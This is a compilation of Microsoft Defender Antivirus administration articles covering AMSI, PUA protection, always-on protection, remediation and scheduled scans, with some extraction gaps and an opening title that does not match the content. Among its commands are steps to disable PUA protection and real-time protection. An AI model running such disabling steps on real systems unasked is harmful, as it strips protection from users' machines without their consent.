Detecting reflective DLL injection through enhanced memory scanning techniques
and behavioral monitoring
Why AMSI?
AMSI provides a deeper level of inspection for malicious software that employs
obfuscation and evasion techniques on Windows' built-in scripting hosts. By integrating
AMSI, Microsoft Defender for Endpoint offers extra layers of protection against
advanced threats.
Supported Scripting Languages

PowerShell
Jscript
VBScript
Windows Script Host (wscript.exe and cscript.exe)
.NET Framework 4.8 or newer (scanning of all assemblies)
Windows Management Instrumentation (WMI)
If you use Microsoft Office 365, AMSI also supports JavaScript, VBA, and XLM.
AMSI doesn't currently support Python or Perl.
Enabling AMSI
To enable AMSI, you need to enable Script scanning. See Configure scanning options for
Also see Defender Policy CSP - Windows Client Management
AMSI resources
Anti-malware Scan Interface (AMSI) APIs are available for developers and antivirus
vendors to implement.
Other Microsoft products such as Exchange and Sharepoint also use AMSI
integration.
More resources to protect against fileless

attacks
Windows Defender Application Control and AppLocker. Enforces strong code
Integrity policies and to allow only trusted applications to run. In the context of
fileless malware, WDAC locks down PowerShell to Constrained Language Mode,
which limits the extended language features that can lead to unverifiable code
execution, such as direct .NET scripting, invocation of Win32 APIs via the Add-Type
cmdlet, and interaction with COM objects. This essentially mitigates PowerShell-
based reflective DLL injection attacks.
Attack surface reduction helps admins protect against common attack vectors.
Enable virtualization-based protection of code integrity. Mitigates kernel-memory

exploits through Hypervisor Code Integrity (HVCI), which makes it difficult to inject
malicious code using kernel-mode software vulnerabilities.
Feedback

Configure the cloud block timeout
period
Article • 02/16/2024
Applies to:

Platforms
Windows
When Microsoft Defender Antivirus finds a suspicious file, it can prevent the file from
running while it queries the Microsoft Defender Antivirus cloud service.
The default period that the file is blocked is 10 seconds. If you're a security
administrator, you can specify more time to wait before the file is allowed to run.
Extending the cloud block timeout period can help ensure there is enough time to
receive a proper determination from the Microsoft Defender Antivirus cloud service.
Prerequisites to use the extended cloud block

timeout
Block at first sight and its prerequisites must be enabled before you can specify an
extended timeout period.
Specify the extended timeout period using

Microsoft Intune
You can specify the cloud block timeout period with an endpoint security policy in
Microsoft Intune.
1. Go to the Intune admin center (https://endpoint.microsoft.com/ ) and sign in.
2. Select Endpoint security, and then under Manage, choose Antivirus.
3. Select (or create) an antivirus policy.

4. In the Configuration settings section, expand Cloud protection. Then, in the
Microsoft Defender Antivirus Extended Timeout In Seconds box, specify the more
time, in seconds, from 1 second to 50 seconds. Whatever you specify is added to
the default 10 seconds.
5. (This step is optional) Make any other changes to your antivirus policy. (Need help?
See Settings for Microsoft Defender Antivirus policy in Microsoft Intune.)
6. Choose Next, and finish configuring your policy.
Specify the extended timeout period using

Group Policy
You can use Group Policy to specify an extended timeout for cloud checks.
Console
2. Right-click the Group Policy Object you want to configure and then select Edit.
3. In the Group Policy Management Editor, go to Computer configuration, and then

MpEngine.
5. Double-click Configure extended cloud check and ensure the option is enabled.
Specify the extra amount of time to prevent the file from running while waiting for
a cloud determination. Specify the extra time, in seconds, from 1 second to 50
seconds. Whatever you specify is added to the default 10 seconds.
6. Select OK.
 Tip

 Tip
Feedback

Configure behavioral, heuristic, and
real-time protection
Article • 02/27/2024
Applies to:

Platforms
Windows
Microsoft Defender Antivirus uses several methods to provide threat protection:
Cloud protection for near-instant detection and blocking of new and emerging
threats
Always-on scanning, using file and process behavior monitoring and other
heuristics (also known as "real-time protection")
Dedicated protection updates based on machine learning, human and automated
big-data analysis, and in-depth threat resistance research
You can configure how Microsoft Defender Antivirus uses these methods with Microsoft
Defender for Endpoint Security Configuration Management, Microsoft Intune, Microsoft
Configuration Manager, Group Policy, PowerShell cmdlets, and Windows Management
Instrumentation (WMI).
This section covers configuration for always-on scanning, including how to detect and
block apps that are deemed unsafe, but may not be detected as malware.
See Use next-gen Microsoft Defender Antivirus technologies through cloud protection
for how to enable and configure Microsoft Defender Antivirus cloud protection.
In this section
ﾉ Expand table
Topic Description
Detect and block potentially Detect and block apps that may be unwanted in your
unwanted applications network, such as adware, browser modifiers and toolbars,
Topic Description
and rogue or fake antivirus apps
Enable and configure Microsoft Enable and configure real-time protection, heuristics, and
Defender Antivirus protection other always-on Microsoft Defender Antivirus monitoring
capabilities features
 Tip

See also
 Tip
Feedback

applications
Article • 08/28/2023
Applies to:

Microsoft Edge
Platforms
Windows
Potentially unwanted applications (PUA) are a category of software that can cause your
machine to run slowly, display unexpected ads, or at worst, install other software that
might be unexpected or unwanted. PUA isn't considered a virus, malware, or other type
of threat, but it might perform actions on endpoints that adversely affect endpoint
performance or use. The term PUA can also refer to an application that has a poor
reputation, as assessed by Microsoft Defender for Endpoint, due to certain kinds of
undesirable behavior.
Here are some examples:
Advertising software that displays advertisements or promotions, including

software that inserts advertisements to webpages.
Bundling software that offers to install other software that isn't digitally signed by
the same entity. Also, software that offers to install other software that qualifies as
PUA.
Evasion software that actively tries to evade detection by security products,
including software that behaves differently in the presence of security products.
 Tip
For more examples and a discussion of the criteria we use to label applications for
special attention from security features, see How Microsoft identifies malware and
potentially unwanted applications.
Potentially unwanted applications can increase the risk of your network being infected
with actual malware, make malware infections harder to identify, or cost your IT and
security teams time and effort to clean them up. PUA protection is supported on
Windows 11, Windows 10, Windows Server 2022, Windows Server 2019, and Windows
Server 2016. If your organization's subscription includes Microsoft Defender for
Endpoint, Microsoft Defender Antivirus blocks apps that are considered to be PUA by
default on Windows devices.
Learn more about Windows Enterprise subscriptions .
Microsoft Edge
The new Microsoft Edge , which is Chromium-based, blocks potentially unwanted
application downloads and associated resource URLs. This feature is provided via
Microsoft Defender SmartScreen.
Enable PUA protection in Chromium-based Microsoft

Edge
Although potentially unwanted application protection in Microsoft Edge (Chromium-
based, version 80.0.361.50) is turned off by default, it can easily be turned on from
within the browser.
1. In your Microsoft Edge browser, select the ellipses, and then choose Settings.
2. Select Privacy, search, and services.
3. Under the Security section, turn on Block potentially unwanted apps.
 Tip
If you are running Microsoft Edge (Chromium-based), you can safely explore the
URL-blocking feature of PUA protection by testing it out on one of our Microsoft
Defender SmartScreen demo pages .
Block URLs with Microsoft Defender SmartScreen

In Chromium-based Microsoft Edge with PUA protection turned on, Microsoft Defender
SmartScreen protects you from PUA-associated URLs.
Security admins can configure how Microsoft Edge and Microsoft Defender SmartScreen
work together to protect groups of users from PUA-associated URLs. There are several
group policy settings explicitly for Microsoft Defender SmartScreen available, including
one for blocking PUA. In addition, admins can configure Microsoft Defender
SmartScreen as a whole, using group policy settings to turn Microsoft Defender
SmartScreen on or off.
Although Microsoft Defender for Endpoint has its own blocklist based upon a data set
managed by Microsoft, you can customize this list based on your own threat
intelligence. If you create and manage indicators in the Microsoft Defender for Endpoint
portal, Microsoft Defender SmartScreen respects the new settings.
Microsoft Defender Antivirus and PUA

protection
The potentially unwanted application (PUA) protection feature in Microsoft Defender
Antivirus can detect and block PUA on endpoints in your network.
７ Note
This feature is available in Windows 11, Windows 10, Windows Server 2022,
Windows Server 2019, and Windows Server 2016.
Microsoft Defender Antivirus blocks detected PUA files and any attempts to download,
move, run, or install them. Blocked PUA files are then moved to quarantine. When a PUA
file is detected on an endpoint, Microsoft Defender Antivirus sends a notification to the
user (unless notifications have been disabled in the same format as other threat
detections. The notification is prefaced with PUA: to indicate its content.
The notification appears in the usual quarantine list within the Windows Security app.
Configure PUA protection in Microsoft

Defender Antivirus
You can enable PUA protection with Microsoft Intune, Microsoft Configuration Manager,
Group Policy, or via PowerShell cmdlets.
At first, try using PUA protection in audit mode. It detects potentially unwanted
applications without actually blocking them. Detections are captured in the Windows
Event log. PUA protection in audit mode is useful if your company is conducting an
internal software security compliance check and it's important to avoid false positives.
Use Intune to configure PUA protection
See the following articles:
Configure device restriction settings in Microsoft Intune

Microsoft Defender Antivirus device restriction settings for Windows 10 in Intune
Use Configuration Manager to configure PUA protection

PUA protection is enabled by default in the Microsoft Configuration Manager (Current
Branch).
See How to create and deploy antimalware policies: Scheduled scans settings for details
on configuring Microsoft Configuration Manager (Current Branch).
For System Center 2012 Configuration Manager, see How to Deploy Potentially
Unwanted Application Protection Policy for Endpoint Protection in Configuration
Manager.
７ Note
PUA events blocked by Microsoft Defender Antivirus are reported in the Windows
Event Viewer and not in Microsoft Configuration Manager.
Use Group Policy to configure PUA protection

1. Download and install Administrative Templates (.admx) for Windows 11 October
2021 Update (21H2)
Console.
3. Select the Group Policy Object you want to configure, and then choose Edit.

5. Expand the tree to Windows Components > Microsoft Defender Antivirus.
6. Double-click Configure detection for potentially unwanted applications.
7. Select Enabled to enable PUA protection.

8. In Options, select Block to block potentially unwanted applications, or select Audit
Mode to test how the setting works in your environment. Select OK.
9. Deploy your Group Policy object as you usually do.
Use PowerShell cmdlets to configure PUA protection
To enable PUA protection
PowerShell
Set-MpPreference -PUAProtection Enabled
Setting the value for this cmdlet to Enabled turns on the feature if it has been disabled.
To set PUA protection to audit mode
PowerShell
Set-MpPreference -PUAProtection AuditMode
Setting AuditMode detects PUAs without blocking them.
To disable PUA protection

We recommend keeping PUA protection turned on. However, you can turn it off by
using the following cmdlet:
PowerShell
Set-MpPreference -PUAProtection Disabled
Setting the value for this cmdlet to Disabled turns off the feature if it has been enabled.
For more information, see Use PowerShell cmdlets to configure and run Microsoft
Defender Antivirus and Defender Antivirus cmdlets.
View PUA events using PowerShell

PUA events are reported in the Windows Event Viewer, but not in Microsoft
Configuration Manager or in Intune. You can also use the Get-MpThreat cmdlet to view
threats that Microsoft Defender Antivirus handled. Here's an example:
Console
CategoryID : 27
DidThreatExecute : False
IsActive : False
Resources :
{webfile:_q:\Builds\Dalton_Download_Manager_3223905758.exe|http://d18yzm5yb8
map8.cloudfront.net/
fo4yue@kxqdw/Dalton_Download_Manager.exe|pid:14196,ProcessStart:132378130057
195714}
RollupStatus : 33
SchemaVersion : 1.0.0.0
SeverityID : 1
ThreatID : 213927
ThreatName : PUA:Win32/InstallCore
TypeID : 0
PSComputerName :
Get email notifications about PUA detections

You can turn on email notifications to receive mail about PUA detections.
See Troubleshoot event IDs for details on viewing Microsoft Defender Antivirus events.
PUA events are recorded under event ID 1160.
View PUA events using advanced hunting

If you're using Microsoft Defender for Endpoint, you can use an advanced hunting query
to view PUA events. Here's an example query:
Console
DeviceEvents
| where ActionType == "AntivirusDetection"
| extend x = parse_json(AdditionalFields)
| project Timestamp, DeviceName, FolderPath, FileName, SHA256, ThreatName =
tostring(x.ThreatName), WasExecutingWhileDetected =
tostring(x.WasExecutingWhileDetected), WasRemediated =
tostring(x.WasRemediated)
| where ThreatName startswith_cs 'PUA:'
To learn more about advanced hunting, see Proactively hunt for threats with advanced
hunting.
Exclude files from PUA protection

Sometimes a file is erroneously blocked by PUA protection, or a feature of a PUA is
required to complete a task. In these cases, a file can be added to an exclusion list.
For more information, see Configure and validate exclusions based on file extension and
folder location.
 Tip

See also
Configure behavioral, heuristic, and real-time protection
 Tip
Feedback
Enable and configure Microsoft
Defender Antivirus always-on protection
Article • 05/25/2023
Applies to:

Platforms
Windows
Always-on protection consists of real-time protection, behavior monitoring, and

heuristics to identify malware based on known suspicious and malicious activities. These
activities include events, such as processes making unusual changes to existing files,
modifying or creating automatic startup registry keys and startup locations (also known
as autostart extensibility points, or ASEPs), and other changes to the file system or file
structure. Always-on protection is an important part of your antivirus protection and
should be enabled.
７ Note
Tamper protection helps keep always-on protection and other security settings
from being changed. As a result, when tamper protection is enabled, any changes
made to tamper-protected settings are ignored. If you must make changes to a
device and those changes are blocked by tamper protection, we recommend using
Manage antivirus settings with Microsoft

Intune
You can use Intune to configure antivirus policies, and then apply those policies across
devices in your organization. Antivirus policies help security admins focus on managing
the discrete group of antivirus settings for managed devices. Each antivirus policy
includes several profiles. Each profile contains only the settings that are relevant for
Microsoft Defender Antivirus for macOS and Windows devices, or for the user
experience in the Windows Security app on Windows devices. For more information, see
Antivirus policy for endpoint security in Intune.
1. Go to the Intune admin center and sign in.
2. In the navigation pane, choose Endpoint security and then, under Manage, choose
Antivirus.
3. Select an existing policy, or choose + Create Policy to create a new policy.
ﾉ Expand table
Task What to do
Create a new 1. In the Create a profile step, in the Platform list, select Windows 10,
policy for Windows 11, and Windows Server. For Profile, select Microsoft
Windows devices Defender Antivirus. Then choose Create.
2. On the Basics step, type a name and description for your policy, and
then choose Next.
3. On the Configuration settings step, expand Defender, select the

settings you want to use for your policy, and then choose Next. To get
help with your settings, refer to Policy CSP - Defender.
4. On the Scope tags step, choose Select scope tags to open the
Select tags pane to assign scope tags to the profile, and then select
Next to continue.
5. On the Assignments page, select the groups to receive this profile,

and then select Next. For more information on assigning profiles, see
Assign user and device profiles.
6. On the Review + create page, when you're done, choose Create.

The new profile is displayed in the list when you select the policy type
for the profile you created.
Create a new 1. In the Create a profile step, in the Platform list, select macOS. For
policy for macOS Profile, select Antivirus. Then choose Create.
devices
2. On the Basics step, type a name and description for your policy, and
then choose Next.
3. On the Configuration settings step, select the settings you want to

use for your policy, and then choose Next. To get help with your
settings, refer to Set preferences for Microsoft Defender for Endpoint
on macOS.
Task What to do
4. On the Scope tags step, choose Select scope tags to open the
Select tags pane to assign scope tags to the profile, and then select
Next to continue.
5. On the Assignments page, select the groups to receive this profile,

and then select Next. For more information on assigning profiles, see
Assign user and device profiles.
6. On the Review + create page, when you're done, choose Create.

The new profile is displayed in the list when you select the policy type
for the profile you created.
Edit an existing 1. Select an antivirus policy for Windows devices.

policy for
Windows devices 2. Next to Configuration settings, choose Edit.
3. Expand Defender, and then edit settings for your policy. To get help
with your settings, refer to Policy CSP - Defender.
4. select Review + save, and then select Save.
Edit an existing 1. Select an antivirus policy for macOS devices.

policy for macOS
devices 2. Select Properties, and then, next to Configuration settings, choose
Edit.
3. Under Microsoft Defender for Endpoint, edit settings for your

policy. To get help with your settings, refer to Set preferences for
4. select Review + save, and then select Save.
Are you using Group Policy?
） Important
We recommend using Microsoft Intune to manage Microsoft Defender Antivirus

settings for your organization. With Intune, you can control where tamper
protection is enabled (or disabled) through policies. You can also protect Microsoft
Defender Antivirus exclusions. For more information, see Protect Microsoft
Defender Antivirus exclusions from tampering.
You can use Group Policy to manage some Microsoft Defender Antivirus settings. Note
that if tamper protection is enabled in your organization, any changes made to tamper-
protected settings are ignored. You can't turn off tamper protection by using Group
Policy.
protection, we recommend using troubleshooting mode to temporarily disable tamper
protection on the device. Note that after troubleshooting mode ends, any changes
made to tamper-protected settings are reverted to their configured state.
You can use Local Group Policy Editor to enable and configure Microsoft Defender
Antivirus always-on protection settings.
Enable and configure always-on protection using Group

Policy
1. Open Local Group Policy Editor, as follows:
a. In your Windows 10 or Windows 11 taskbar search box, type gpedit.
b. Under Best match, select Edit group policy to launch Local Group Policy Editor.

2. In the left pane of Local Group Policy Editor, expand the tree to Computer
Configuration > Administrative Templates > Windows Components > Microsoft
Defender Antivirus.
3. Configure the Microsoft Defender Antivirus antimalware service policy setting.
In the Microsoft Defender Antivirus details pane on right, double-click Allow

antimalware service to start up with normal priority, and set it to Enabled.
Then select OK.
4. Configure the Microsoft Defender Antivirus real-time protection policy settings, as

follows:
a. In the Microsoft Defender Antivirus details pane, double-click Real-time

Protection. Or, from the Microsoft Defender Antivirus tree on left pane, select
Real-time Protection.
b. In the Real-time Protection details pane on right, double-click the policy setting
as specified in Real-time protection policy settings (later in this article).
c. Configure the setting as appropriate, and select OK.
d. Repeat the previous steps for each setting in the table.
5. Configure the Microsoft Defender Antivirus scanning policy setting, as follows:
a. From the Microsoft Defender Antivirus tree on left pane, select Scan.
b. In the Scan details pane on right, double-click Turn on heuristics, and set it to
Enabled.
c. Select OK.
6. Close Local Group Policy Editor.
Real-time protection policy settings

For the most current settings, get the latest ADMX files in your central store. See How to
create and manage the Central Store for Group Policy Administrative Templates in
Windows and download the latest files.
Disable real-time protection in Group Policy
２ Warning
Disabling real-time protection drastically reduces the protection on your

endpoints and is not recommended. In addition, if tamper protection is enabled,
you cannot turn it off by using Group Policy. If you must make changes to a device
and those changes are blocked by tamper protection, we recommend using
1. Open Local Group Policy Editor.

a. In your Windows 10 or Windows 11 taskbar search box, type gpedit.
b. Under Best match, select Edit group policy to launch Local Group Policy Editor.
2. In the left pane of Local Group Policy Editor, expand the tree to Computer
Configuration > Administrative Templates > Windows Components > Microsoft
Defender Antivirus > Real-time Protection.
3. In the Real-time Protection details pane on right, double-click Turn off real-time
protection.
4. In the Turn off real-time protection setting window, set the option to Enabled.
5. select OK.
6. Close Local Group Policy Editor.
See also
If you're looking for antivirus-related information for other platforms, see:

 Tip
Feedback

Configure remediation for Microsoft
Defender Antivirus detections
Article • 09/15/2023
Applies to:

Platforms
Windows
When Microsoft Defender Antivirus runs a scan, it attempts to remediate or remove

threats that are detected. Remediation actions can include removing a file, sending it to
quarantine, or allowing it to remain. This article includes information and links to
resources about specifying what actions should be taken when threats are detected on
devices. You can choose from several methods, such as:
Microsoft Intune
Group Policy
PowerShell or Windows Management Instrumentation (WMI)
） Important
Microsoft Defender Antivirus detects and remediates files based on many factors.
Sometimes, completing a remediation requires a reboot. Even if the detection is
later determined to be a false positive, the reboot must be completed to ensure all
additional remediation steps have been completed.
If you are certain Microsoft Defender Antivirus quarantined a file based on a false
positive, you can restore the file from quarantine after the device reboots. See
Restore quarantined files in Microsoft Defender Antivirus. To avoid this problem
in the future, you can exclude files from the scans. See Configure and validate
exclusions for Microsoft Defender Antivirus scans.
Also see Configure remediation-required scheduled full Microsoft Defender Antivirus

scans for more remediation-related settings.
Configure remediation options using Intune
1. As a global or security administrator, go to the Intune admin center and sign in.
2. Under Manage, choose Antivirus.
3. Either create a new policy, or edit an existing policy using the following settings:
Platform: Windows 10, Windows 11, and Windows Server

Profile: Microsoft Defender Antivirus
4. For configuration settings, expand Defender, scroll down to Allow On Access

Protection. and set it to Allowed.
5. Under Allow On Access Protection, select a remediation action for each level:
High severity threats

Severe threats
Moderate severity threats
Low severity threats
6. Specify the device groups that should receive this policy (such as All Devices).
7. Review your settings, and then choose Save.
For more information about antivirus policies in Intune, see Antivirus policy for endpoint
security in Intune.
Configure remediation options using

If you're using Configuration Manager, see the following articles:
Configure Endpoint Protection in Configuration Manager

Default Actions Settings
Configure remediation options using Group

Policy
Console, and edit the Group Policy Object you want to configure.
2. In the Group Policy Management Editor, go to Computer configuration and then
3. Expand the tree to Windows components > Microsoft Defender Antivirus.
4. Using the following table, edit the policy as needed.
ﾉ Expand table
Setting Description Default setting

(if not
configured)
Scan A system restore point is created each day Disabled

Create a system before cleaning or scanning is attempted.
restore point.
Scan Specify how many days items should be kept 30 days

Turn on removal of in the scan history.
items from scan
history folder.
Root Specify whether Microsoft Defender Antivirus Disabled. Threats

Turn off routine automatically remediates threats, or whether are remediated
remediation. to prompt the user. automatically.
Quarantine Specify how many days items should be kept 90 days

Configure removal of in quarantine before being removed.
items from
Quarantine folder.
Threats Every threat that is detected by Microsoft Not applicable

Specify threat alert Defender Antivirus is assigned a threat level
levels at which default (low, medium, high, or severe). You can use
action shouldn't be this setting to define how all threats for each
taken when detected. of the threat levels should be remediated
(quarantined, removed, or ignored).
Threats Specify how specific threats (using their threat Not applicable
Specify threats upon ID) should be remediated. You can specify
which default action whether the specific threat should be
shouldn't be taken quarantined, removed, or ignored.
when detected.
5. Select OK.
Configure remediation options using
PowerShell or WMI
You can also use the Set-MpPreference PowerShell cmdlet or MSFT_MpPreference WMI
class to configure these settings.
See also
 Tip
Feedback

Configure scheduled quick or full
Microsoft Defender Antivirus scans
Article • 12/14/2023
Applies to:

Platforms
Windows
You can set up regular, scheduled antivirus scans on devices. These scheduled scans are
in addition to always-on, real-time protection and on-demand antivirus scans. When
you schedule a scan, you can specify the type of scan, when the scan should occur, and
if the scan should occur after a protection update or when a device isn't being used. You
can also set up special scans to complete remediation actions if needed.
Compare the quick scan, full scan, and custom scan

Choose a scan type
Keep these important points
Try the scheduled quick scan performance optimization
Additional resources
Comparing the quick scan, full scan, and

custom scan
The following table describes the different types of scans you can configure.
ﾉ Expand table
Scan type Description
Quick scan A quick scan looks at all the locations where there could be malware registered
(recommended) to start with the system, such as registry keys and known Windows startup
folders.
A quick scan helps provide strong protection against malware that starts with
the system and kernel-level malware, together with always-on real-time
protection, which reviews files when they're opened and closed, and whenever a
Scan type Description
user navigates to a folder.
In most cases, a quick scan is sufficient and is the recommended option for
scheduled scans. Starting with the December 2023 (4.18.2311.x.x) release of
Platform Update, you have the option to scan all files and directories that are
excluded from real-time protection using contextual exclusions are scanned
during a quick scan.
Full scan A full scan starts by running a quick scan and then continues with a sequential
file scan of all mounted fixed disks and removable/network drives (if the full
scan is configured to do so).
A full scan can take a few hours or days to complete, depending on the amount
and type of data that needs to be scanned.
When a full scan begins, it uses the security intelligence definitions installed at
the time the scan starts. If new security intelligence updates are made available
during the full scan, another full scan is required in order to scan for new threat
detections contained in the latest update.
Because of the time and resources involved in a full scan, in general, we don't
recommend scheduling full scans.
Custom scan A custom scan runs on files and folders that you specify. For example, you can
choose to scan a USB drive or a specific folder on your device's local drive.
７ Note
By default, quick scans run on mounted removable devices, such as USB drives.
How to choose a scan type

Use the following table to choose a scan type.
ﾉ Expand table
Scenario Recommended scan type
You want to set up Quick scan

regular, scheduled
scans A quick scan checks the processes, memory, profiles, and certain
locations on the device. Together with always-on real-time protection, a
quick scan helps provide strong coverage both for malware that starts
with the system and kernel-level malware. Real-time protection reviews
Scenario Recommended scan type
files when they're opened and closed, and whenever a user navigates to
a folder.
Threats, such as Quick scan

malware, are detected
on an individual In most cases, a quick scan will catch and clean up detected malware.
device
You want to run an Quick scan

on-demand scan
You want to make sure Custom scan

a portable device,
such as a USB drive, A custom scan enables you to select specific locations, folders, or files,
doesn't contain and runs a quick scan.
malware
You have installed or Quick scan or full scan

re-enabled Microsoft
Defender Antivirus A quick scan checks the processes, memory, profiles, and certain
locations on the device. If you prefer, you can choose to run a full scan
after you have enabled or installed Microsoft Defender Antivirus. Just
keep in mind it can take a while to run a full scan.

By default, Microsoft Defender Antivirus checks for an update 15 minutes before
the time of any scheduled scans. You can manage the schedule for when
protection updates should be downloaded and applied to override this default.
If a device is unplugged and running on battery during a scheduled full scan, the
scheduled scan stops with event 1002, which states that the scan stopped before
completion. Microsoft Defender Antivirus runs a full scan at the next scheduled
time.
Scheduled scans run according to the local time zone of the device.
Malicious files can be stored in locations that aren't included in a quick scan.
However, always-on, real-time protection reviews all files that are opened &
closed, and any files that are in folders that are accessed by a user. The
combination of real-time protection and a quick scan helps provide strong
protection against malware.
On-access protection with cloud-delivered protection helps ensure that all the files
accessed on the system are being scanned with the latest security intelligence and
cloud machine learning models.
When real-time protection detects malware and the extent of the affected files
isn't determined initially, Microsoft Defender Antivirus initiates a full scan as part of
the remediation process.
If a device is offline for an extended period of time, a full scan can take longer to
complete.
You can configure quick scans to scan real-time protection exclusions by using
PowerShell, Intune, or Group Policy.
Scheduled quick scan performance

optimization
As a performance optimization, Microsoft Defender Antivirus skips running scheduled
quick scans in some situations. This optimization only applies to a quick scan when
initiated by a schedule – it doesn't affect a quick scan initiated by an on-demand
antivirus scan. This optimization reduces performance degradation by avoiding running
a quick scan when it isn't necessary and won't affect protection.
By default, if a qualified quick scan ran within the last seven days, a new quick scan
won't be initiated. A quick scan is considered to be qualified if:
The scan occurs after the last Security Intelligence Update was installed;
Real-time protection wasn't disabled during that time period; and,
The machine was rebooted.
This optimization doesn't apply to the following conditions:
If Microsoft Defender for Endpoint is Managed

If Microsoft Defender Endpoint Detection and Response (EDR) is installed
If the computer was restarted since the last quick scan
If real-time protection is disabled after the last quick scan occurred
If the last initiated quick scan wasn't completed
This optimization applies to machines running Windows 10 Anniversary Update (version

1607) and all subsequent Windows releases, as well as Windows Server 2016 (version
1607) and subsequent Windows Server releases, but doesn't apply to Core Server
installations.
See also
 Tip
Feedback

Schedule antivirus scans using Group
Policy
Article • 03/07/2023
Applies to:

Platforms
Windows
This article describes how to configure scheduled scans using Group Policy. To learn
more about scheduling scans and about scan types, see Configure scheduled quick or
full Microsoft Defender Antivirus scans.
Configure antivirus scans using Group Policy

1. On your Group Policy management machine, in the Group Policy Editor, go to
Computer configuration > Administrative Templates > Windows Components >
Microsoft Defender Antivirus > Scan.
3. Specify settings for the Group Policy Object, and then select OK.
4. Repeat steps 1-4 for each setting you want to configure.
5. Deploy your Group Policy Object as you normally do. If you need help with Group
Policy Objects, see Create a Group Policy Object.
７ Note
When configuring scheduled scans, the setting Start the scheduled scan only when
computer is on but not in use, which is enabled by default, can impact the
expected scheduled time by requiring the machine to be idle first.
For weekly scans, default behavior on Windows Server is to scan outside of

automatic maintenance when the machine is idle. The default on Windows 10 and
later is to scan during automatic maintenance when the machine is idle. To change
this behavior, modify the settings by disabling ScanOnlyIfIdle, and then define a
schedule.
For more information, see the Manage when protection updates should be downloaded
and applied and Prevent or allow users to locally modify policy settings topics.
Group Policy settings for scheduling scans

ﾉ Expand table
Location Setting Description Default setting

(if not
configured)
Scan Specify the scan Quick scan

type to use for a
scheduled scan
Scan Specify the day of Specify the day (or never) to run a scan. Never
the week to run a
scheduled scan
Scan Specify the time Specify the number of minutes after midnight 2 a.m.
of day to run a (for example, enter 60 for 1 a.m.).
scheduled scan
Root Randomize In Microsoft Defender Antivirus, randomize Enabled

scheduled task the start time of the scan to any interval from
times 0 to 23 hours. By default, scheduled tasks will
begin at a random time within four hours of
the time specified in Task Scheduler.
Group Policy settings for scheduling scans for

when an endpoint is not in use
ﾉ Expand table
Location Setting Description Default setting (if

not configured)
Scan Start the scheduled scan Scheduled scans will not run, Enabled
only when computer is on unless the computer is on but
but not in use not in use
７ Note
When you schedule scans for times when endpoints are not in use, scans do not
honor the CPU throttling configuration and will take full advantage of the resources
available to complete the scan as fast as possible.
Group Policy settings for scheduling

remediation-required scans
ﾉ Expand table

(if not
configured)
Remediation Specify the day of the week Specify the day (or never) to Never
to run a scheduled full scan run a scan.
to complete remediation
Remediation Specify the time of day to run Specify the number of 2 a.m.
a scheduled full scan to minutes after midnight (for
complete remediation example, enter 60 for 1 a.m.)
Group Policy settings for scheduling daily scans

ﾉ Expand table

(if not
configured)
Scan Specify the Specify how many hours should elapse before Never
interval to run the next quick scan. For example, to run every
quick scans per two hours, enter 2, for once a day, enter 24.
day Enter 0 to never run a daily quick scan.
Scan Specify the Specify the number of minutes after midnight 2 a.m.
time for a daily (for example, enter 60 for 1 a.m.)
quick scan
Group Policy settings for scheduling scans after
protection updates
ﾉ Expand table
Location Setting Description Default setting (if

not configured)
Signature Turn on scan after A scan will occur immediately Enabled

updates Security intelligence after a new protection update is
update downloaded
 Tip

 Tip
Feedback

Schedule antivirus scans using
PowerShell
Article • 07/18/2023
Applies to:

Platforms
Windows
Windows Server
This article describes how to configure scheduled scans using PowerShell cmdlets. To
learn more about scheduling scans and about scan types, see Configure scheduled quick
or full Microsoft Defender Antivirus scans.
Use PowerShell cmdlets to schedule scans

Use the following cmdlets:
PowerShell
Set-MpPreference -ScanParameters
Set-MpPreference -ScanScheduleDay
Set-MpPreference -ScanScheduleTime
Set-MpPreference -RandomizeScheduleTaskTimes
Defender Antivirus and Defender Antivirus cmdlets for more information on how to use
PowerShell with Microsoft Defender Antivirus.
PowerShell cmdlets for scheduling scans when

an endpoint is not in use
PowerShell
Set-MpPreference -ScanOnlyIfIdleEnabled
７ Note
PowerShell cmdlets for scheduling scans to

complete remediation
PowerShell
Set-MpPreference -RemediationScheduleDay
Set-MpPreference -RemediationScheduleTime
See Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and
Defender Antivirus cmdlets for more information on how to use PowerShell with
PowerShell cmdlets for scheduling daily scans

PowerShell
Set-MpPreference -ScanScheduleQuickScanTime
For more information about how to use PowerShell with Microsoft Defender Antivirus,
see Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and
Defender Antivirus cmdlets.
 Tip

 Tip
Feedback

Schedule antivirus scans using Windows
Management Instrumentation (WMI)
Article • 02/21/2024
Applies to:

[Microsoft Defender for Business
Platforms
Windows
Windows Server
This article describes how to configure scheduled scans using WMI. To learn more about
scheduling scans and about scan types, see Configure scheduled quick or full Microsoft
Defender Antivirus scans.

to schedule scans
WMI
ScanParameters
ScanScheduleDay
ScanScheduleTime
RandomizeScheduleTaskTimes
For more information and allowed parameters, see Windows Defender WMIv2 APIs
WMI for scheduling scans when an endpoint is

not in use
WMI
ScanOnlyIfIdleEnabled
For more information about APIs and allowed parameters, see Windows Defender
WMIv2 APIs.
７ Note
WMI for scheduling scans to complete

remediation
WMI
RemediationScheduleDay
RemediationScheduleTime
For more information and allowed parameters, see Windows Defender WMIv2 APIs.
WMI for scheduling daily scans

WMI
ScanScheduleQuickScanTime
 Tip

 Tip
Feedback

Use limited periodic scanning in
Article • 02/18/2024
Applies to:
Microsoft Defender for Individual
Platforms
Windows
７ Note
Microsoft does not support using this feature in Enterprise environments. This
feature only uses a limited subset of the Microsoft Defender Antivirus capabilities
to detect malware, and can't detect most malware and potentially unwanted
software. Management of the feature is not supported, the feature cannot be
enabled or disabled through policies, and reporting capabilities are extremely
limited. Microsoft recommends that enterprise orgnaizations choose a primary
antivirus/antimalware solution, and use it exclusively.
Limited periodic scanning is a special type of threat detection and remediation that can
be enabled when another antivirus product is installed on a Windows 10 or Windows 11
device. It can only be enabled in certain situations. For more information about limited
periodic scanning and how Microsoft Defender Antivirus works with other antivirus
products, see Microsoft Defender Antivirus compatibility.
How to enable limited periodic scanning

By default, Microsoft Defender Antivirus enables itself on a Windows 10 or a Windows
11 device if there is no other antivirus product installed, or if the other product is out-
of-date, expired, or not working correctly. If Microsoft Defender Antivirus is enabled, the
usual options to configure it are available on that device:

If another antivirus product is installed and working correctly, Microsoft Defender

Antivirus disables itself. In this case, the Windows Security app changes the Virus &
threat protection section to show status about the antivirus product, and provides a link
to the product's configuration options.
Underneath the name of a non-Microsoft antivirus product, a link appears as Microsoft

Defender Antivirus options. Select this link to show the toggle that enables limited
